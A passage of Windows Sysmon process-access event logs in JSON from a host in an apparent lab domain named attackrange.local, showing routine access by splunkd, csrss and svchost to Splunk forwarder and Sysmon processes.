Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010860E0C00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.819","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT